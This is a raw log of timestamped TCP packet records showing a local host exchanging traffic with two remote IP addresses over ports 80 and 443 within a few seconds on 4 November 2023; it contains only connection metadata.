                                                    Nov 4, 2023 01:30:13.095457077 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.098510981 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.098700047 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.098763943 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.131793976 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.132096052 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.132178068 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.195192099 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.195323944 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.228899956 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.229059935 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.261085033 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.261221886 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.310719013 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.310930967 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.310985088 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.311033010 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.311144114 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.311156988 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.311237097 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.311619043 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.311674118 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.311801910 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.311861992 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.312274933 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.312333107 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.312916994 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.312972069 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.313249111 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.313304901 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.314486980 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.314553976 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.315557003 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.315568924 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.315618992 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.315892935 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.315975904 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.318114996 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.318171024 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.318278074 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.318341970 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.321110010 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.321152925 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.325695992 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.325757027 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.326164007 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.326174974 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.326208115 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.326234102 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.327718019 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.327773094 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.329220057 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.329267979 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.330152035 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.330210924 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.331465960 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.331515074 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.332691908 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.332739115 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.333254099 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.333307028 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.333916903 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.334048033 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.334120989 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.340246916 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.340363979 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.368659019 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.368907928 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.369007111 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.404258966 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.404439926 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.443972111 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.444109917 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.471391916 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.471494913 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.495995045 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.496190071 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.552345037 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.552480936 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.575946093 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.576102018 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.576184988 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.585067034 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.585213900 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.585288048 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.593725920 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.593873024 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.593936920 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.599874020 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.599952936 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.605027914 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.605276108 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.605348110 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.610721111 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.610857964 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.617125034 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.617264986 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.617341042 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.640649080 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.640818119 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.640901089 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.697942019 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.698071957 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.749916077 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.750052929 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.750107050 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.767576933 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.767714977 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.767777920 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.805871010 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.806003094 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.822478056 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.822592020 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.835685968 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.835920095 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.835978985 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.848303080 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.848439932 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.848504066 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.851809025 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.851948977 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.852025986 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.856676102 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.856786966 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.865183115 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.865324020 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.865375042 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.868372917 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.868431091 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.873097897 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.873223066 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.873284101 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.878817081 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.878958941 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.879012108 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.890458107 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.890826941 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.932672024 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.932827950 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.968456030 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.968614101 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:14.005098104 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:14.005254030 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:14.005314112 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:14.011111975 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:14.011171103 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:14.027555943 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:14.087347031 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:14.111927032 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:14.117630959 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:14.123023987 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:14.129132032 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:14.131356001 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:14.137350082 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:14.138525963 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:14.145425081 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:14.153640032 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:14.159070969 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:14.161279917 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:14.176171064 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:14.210803986 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:14.229396105 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:14.242521048 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:14.249090910 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:15.413336039 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:15.413363934 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:15.413377047 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:15.413520098 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:15.700282097 CET4971580192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:15.792354107 CET8049715162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:15.792517900 CET4971580192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:15.792700052 CET4971580192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:15.884696960 CET8049715162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:15.897494078 CET8049715162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:15.897567987 CET4971580192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:15.906574965 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:15.906613111 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:15.906680107 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:15.915431023 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:15.915445089 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.112359047 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.112451077 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.212153912 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.212173939 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.212893963 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.212969065 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.214981079 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.258526087 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.359966993 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.360023022 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.360058069 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.360121965 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.360126972 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.360126972 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.360126972 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.360152006 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.360171080 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.360193968 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.360198975 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.360244036 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.360333920 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.360372066 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.360375881 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.360414982 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.360455990 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.360491037 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.360526085 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.360562086 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.360579967 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.360616922 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.360620975 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.360656977 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.360703945 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.360749960 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.360763073 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.360805035 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.360809088 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.360847950 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.360851049 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.360889912 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.360893965 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.360930920 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.360944986 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.360982895 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.361427069 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.361474991 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.361479998 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.361517906 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.361588001 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.361629009 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.361824036 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.361869097 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.362085104 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.362127066 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.362131119 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.362166882 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.362561941 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.362603903 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.362647057 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.362684011 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.362721920 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.362760067 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.362806082 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.362867117 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.362871885 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.362919092 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.362922907 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.362965107 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.362968922 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.363006115 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.363342047 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.363388062 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.363392115 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.363426924 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.363490105 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.363531113 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.363730907 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.363771915 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.363801003 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.363838911 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.363864899 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.363908052 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.364336967 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.364383936 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.364413977 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.364450932 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.364483118 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.364525080 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.364546061 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.364584923 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.364744902 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.364799023 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.452337027 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.452537060 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.453109980 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.453176975 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.453385115 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.453438997 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.454003096 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.454055071 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.454319000 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.454370022 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.454554081 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.454605103 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.454701900 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.454749107 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.455001116 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.455051899 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.455250978 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.455306053 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.455651999 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.455703974 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.455893993 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.455948114 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.456420898 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.456470013 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.457073927 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.457125902 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.457585096 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.457637072 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.457745075 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.457792997 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.458357096 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.458416939 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.458925962 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.458976030 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.551554918 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.551671982 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.551831007 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.551831007 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.551856995 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.551902056 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.552809000 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.552869081 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.553088903 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.553144932 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.553236961 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.553288937 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.553396940 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.553450108 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.554657936 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.554742098 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.555468082 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.555519104 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.556085110 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.556133032 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.556217909 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.556281090 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.556566000 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.556627035 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.556737900 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.556791067 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.557534933 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.557589054 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.557765961 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.557822943 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.558687925 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.558746099 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.559201956 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.559251070 CET49716443192.168.2.5162.159.130.233
